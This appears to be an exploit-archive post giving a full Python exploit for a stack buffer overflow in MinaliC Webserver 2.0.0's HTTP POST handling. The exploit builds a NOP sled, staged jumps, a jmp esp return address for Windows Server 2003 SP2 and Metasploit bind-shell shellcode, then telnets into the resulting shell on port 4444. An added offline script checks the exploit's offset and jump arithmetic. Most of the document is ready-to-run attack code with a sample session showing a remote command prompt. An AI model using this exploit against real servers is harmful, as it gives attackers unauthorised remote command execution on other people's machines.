MinaliC Webserver 2.0.0 Buffer Overflow

Posted Apr 19, 2013
Authored by Antonius | Site cr0security.com

MinaliC Webserver version 2.0.0 stack-based buffer overflow exploit (HTTP POST handling) that binds a shell to port 4444. Works on Windows Server 2003 SP2 only, as stated in the exploit header; the return address used is a jmp esp in that build's ntdll.dll.

tags | exploit, overflow, shell
systems | windows
SHA-256 | 0f734001f936a5b891c34b75bd2c451e9c1b32b8939d772c3c1bc8137fb7edaf

#!/usr/bin/env python3
# Title : MinaliC Webserver 2.0.0 Post Method Remote Command Execution
# (Works for Windows Server 2003 sp2 Only)
#
# Date: 12 Apr 2013
#
# Exploit Author: Antonius - (http://www.cr0security.com - http://www.codewall-security.com)
#
# Thanks : http://www.offensive-security.com , http://www.security-hooligan.com, http://www.techorganic.com & Indonesian Backtrack Team
#
# Vendor Homepage: http://minalic.sourceforge.net
#
# Version: MinaliC Webserver 2.0.0
#
# Tested on: Windows Server 2003 Service Pack 2, English
#
# Description:
# A stack-based buffer overflow occurs when MinaliC 2.0.0 handles the HTTP POST method.
# This exploit was tested on, and works on, Windows Server 2003 SP2 only.
# Exploitation will fail if the wrong MinaliC binary path is specified, because the
# distance to the saved return address depends on the length of that path.
# Usage : ./exploit.py ip_address minalic_bin_path
#cr0security@cr0security-Vostro1310:~/Desktop/ctp_exercise/working_exploit$ python exploit.py 192.168.1.2 'c:\minalic\bin'
#Sending Exploit Please Wait
#Trying 192.168.1.2...
#Connected to 192.168.1.2.
#Escape character is '^]'.
#Microsoft Windows [Version 5.2.3790]
#(C) Copyright 1985-2003 Microsoft Corp.
#C:\minalic\bin>

import os
import socket
import struct
import sys
import time

if len(sys.argv) < 2:
    print("MinaliC Webserver Post Method Remote Command Execution (Works for Windows Server 2003 sp2 Only)")
    print("Usage : ./exploit.py 'ip address' 'path of minalic binary'")
    # raw string: otherwise "\b" in the example path is printed as a backspace
    print(r"Example : python exploit.py 192.168.1.2 'c:\minalic\bin'")
    sys.exit(1)

ip = sys.argv[1]

# The server prepends its binary path to the requested URI before the overflow,
# so the number of bytes needed to reach the saved EIP depends on that path.
# Default install path is C:\minalic\bin (14 characters), which needs a 240-byte sled.
path_length = len(sys.argv[2]) if len(sys.argv) > 2 else 14

# NOP sled, shortened or lengthened by the difference from the default path length
# so that the return address still lands exactly on the saved EIP
junk = b"\x90" * (240 - (path_length - 14))

# Only 4 bytes are available after the return address: jmp short -0x30 back into the sled
first_stage = b"\xeb\xd0" + b"\x90" * 2

# The sled runs into this stub. ecx points into our controlled buffer (the NOP sled
# in front of the shellcode in the User-Agent header), so: add ecx, 4 ; jmp ecx
second_stage = b"\x83\xc1\x04\xff\xe1"

sec2 = junk + second_stage

# 0x7C86A01B jmp esp from ntdll.dll on Windows Server 2003 SP2
ret = struct.pack("<I", 0x7C86A01B)

host = b"\xff" * 140

# metasploit windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=127.0.0.1,
shellcode = (b"\xbd\x78\x69\xd9\xaa\xd9\xc0\xd9\x74\x24\xf4\x58\x2b\xc9"
             b"\xb1\x56\x83\xe8\xfc\x31\x68\x0f\x03\x68\x77\x8b\x2c\x56"
             b"\x6f\xc2\xcf\xa7\x6f\xb5\x46\x42\x5e\xe7\x3d\x06\xf2\x37"
             b"\x35\x4a\xfe\xbc\x1b\x7f\x75\xb0\xb3\x70\x3e\x7f\xe2\xbf"
             b"\xbf\xb1\x2a\x13\x03\xd3\xd6\x6e\x57\x33\xe6\xa0\xaa\x32"
             b"\x2f\xdc\x44\x66\xf8\xaa\xf6\x97\x8d\xef\xca\x96\x41\x64"
             b"\x72\xe1\xe4\xbb\x06\x5b\xe6\xeb\xb6\xd0\xa0\x13\xbd\xbf"
             b"\x10\x25\x12\xdc\x6d\x6c\x1f\x17\x05\x6f\xc9\x69\xe6\x41"
             b"\x35\x25\xd9\x6d\xb8\x37\x1d\x49\x22\x42\x55\xa9\xdf\x55"
             b"\xae\xd3\x3b\xd3\x33\x73\xc8\x43\x90\x85\x1d\x15\x53\x89"
             b"\xea\x51\x3b\x8e\xed\xb6\x37\xaa\x66\x39\x98\x3a\x3c\x1e"
             b"\x3c\x66\xe7\x3f\x65\xc2\x46\x3f\x75\xaa\x37\xe5\xfd\x59"
             b"\x2c\x9f\x5f\x36\x81\x92\x5f\xc6\x8d\xa5\x2c\xf4\x12\x1e"
             b"\xbb\xb4\xdb\xb8\x3c\xba\xf6\x7d\xd2\x45\xf8\x7d\xfa\x81"
             b"\xac\x2d\x94\x20\xcc\xa5\x64\xcc\x19\x69\x35\x62\xf1\xca"
             b"\xe5\xc2\xa1\xa2\xef\xcc\x9e\xd3\x0f\x07\xa9\xd3\xc1\x73"
             b"\xfa\xb3\x23\x84\xed\x1f\xad\x62\x67\xb0\xfb\x3d\x1f\x72"
             b"\xd8\xf5\xb8\x8d\x0a\xaa\x11\x1a\x02\xa4\xa5\x25\x93\xe2"
             b"\x86\x8a\x3b\x65\x5c\xc1\xff\x94\x63\xcc\x57\xde\x5c\x87"
             b"\x22\x8e\x2f\x39\x32\x9b\xc7\xda\xa1\x40\x17\x94\xd9\xde"
             b"\x40\xf1\x2c\x17\x04\xef\x17\x81\x3a\xf2\xce\xea\xfe\x29"
             b"\x33\xf4\xff\xbc\x0f\xd2\xef\x78\x8f\x5e\x5b\xd5\xc6\x08"
             b"\x35\x93\xb0\xfa\xef\x4d\x6e\x55\x67\x0b\x5c\x66\xf1\x14"
             b"\x89\x10\x1d\xa4\x64\x65\x22\x09\xe1\x61\x5b\x77\x91\x8e"
             b"\xb6\x33\xa1\xc4\x9a\x12\x2a\x81\x4f\x27\x37\x32\xba\x64"
             b"\x4e\xb1\x4e\x15\xb5\xa9\x3b\x10\xf1\x6d\xd0\x68\x6a\x18"
             b"\xd6\xdf\x8b\x09")

# Shellcode goes in the User-Agent header, padded with NOPs to a fixed 898 bytes
# so the second stage's jmp ecx lands in the sled regardless of encoder output size
agent = b"User-Agent: " + b"\x90" * (898 - len(shellcode)) + shellcode
payload = (b"POST /" + sec2 + ret + first_stage + b" HTTP/1.1\r\n"
           + b"Host: " + host + b"\r\n"
           + agent + b"\r\n\r\n")

print("Sending Exploit Please Wait")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 8080))
s.sendall(payload)
s.close()

# give the bind shell time to come up, then connect to it
time.sleep(15)
os.system("telnet " + ip + " 4444")
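The exploit's offset arithmetic (a 240-byte sled for a 14-character binary path, shrunk by one byte for every extra path character) only works if the return address always lands the same distance from the start of the buffer the server builds from path + URI. The script below is an added offline check, not part of the original exploit: it rebuilds the request-line layout with the exploit's own constants and verifies that the EIP overwrite stays at a fixed offset for any path length, that the short backward jump in the 4-byte first stage (EB D0) lands inside the NOP sled, and that the sled runs straight into the second stage. The assumption that the server concatenates path and URI is inferred from the exploit's arithmetic; the offset value 260, the minimum-sled bound and all helper names are ours.

```python
import struct

# Layout constants copied from the exploit above
DEFAULT_PATH_LEN = 14                      # len(r"c:\minalic\bin")
DEFAULT_JUNK_LEN = 240                     # sled sent with the default path
SECOND_STAGE = b"\x83\xc1\x04\xff\xe1"     # add ecx, 4 ; jmp ecx
RET = struct.pack("<I", 0x7C86A01B)        # jmp esp in ntdll.dll (Win2003 SP2)
FIRST_STAGE = b"\xeb\xd0" + b"\x90" * 2    # jmp short -0x30 ; nop ; nop
NOP = 0x90
BACK_JUMP = 0x30                           # EB D0: 0xd0 == -48 relative to next insn


def min_junk_len():
    """Smallest sled for which the first stage's backward jump still lands in it.

    The first stage starts at 1 + junk + len(SECOND_STAGE) + len(RET) in the URI
    (the leading byte is '/'); the jump target is that + 2 - BACK_JUMP and must be
    at index >= 1 to sit inside the sled.  Assumed bound, derived here, not from
    the original exploit.
    """
    return BACK_JUMP - 2 - len(SECOND_STAGE) - len(RET)


def junk_len(path_len):
    """Sled length that keeps the EIP overwrite at a constant offset."""
    n = DEFAULT_JUNK_LEN - (path_len - DEFAULT_PATH_LEN)
    if n < min_junk_len():
        raise ValueError("binary path too long: sled of %d bytes cannot absorb "
                         "the first stage's backward jump" % n)
    return n


def max_path_len():
    """Longest binary path this layout can handle before the back-jump misses the sled."""
    return DEFAULT_PATH_LEN + DEFAULT_JUNK_LEN - min_junk_len()


def build_uri(path_len):
    """The URI portion of the request line, exactly as the exploit assembles it."""
    return b"/" + b"\x90" * junk_len(path_len) + SECOND_STAGE + RET + FIRST_STAGE


def eip_offset(path_len):
    """Offset of the return-address overwrite measured from the start of the
    path + URI buffer (assumption: the server concatenates them in that order)."""
    return path_len + build_uri(path_len).index(RET)


def short_jmp_target(buf, pos):
    """Resolve an x86 'EB rel8' short jump at buf[pos]; return the target offset."""
    if buf[pos] != 0xEB:
        raise ValueError("not a short jmp at offset %d" % pos)
    rel = struct.unpack("<b", buf[pos + 1:pos + 2])[0]
    return pos + 2 + rel


def slide(buf, start):
    """Walk NOPs from 'start' and return the offset of the first non-NOP byte."""
    i = start
    while i < len(buf) and buf[i] == NOP:
        i += 1
    return i


def check_layout(path_len):
    """Verify the three properties the exploit relies on for a given path length."""
    uri = build_uri(path_len)
    first = uri.index(FIRST_STAGE)
    target = short_jmp_target(uri, first)
    landing = slide(uri, target)
    return {
        "eip_offset": eip_offset(path_len),
        "jmp_target": target,
        "lands_in_sled": 1 <= target < first and uri[target] == NOP,
        "sled_ends_at_second_stage": uri[landing:landing + len(SECOND_STAGE)] == SECOND_STAGE,
    }


if __name__ == "__main__":
    for plen in (DEFAULT_PATH_LEN, 10, 30, max_path_len()):
        print(plen, check_layout(plen))
```

Running it shows the EIP overwrite at offset 260 for every path length, the back-jump landing 37 bytes before the end of the sled, and a hard limit of 217 path characters beyond which the exploit's 4-byte first stage can no longer reach the sled; with the default path the jump target is URI offset 204 and the sled ends at offset 241 where the second stage begins.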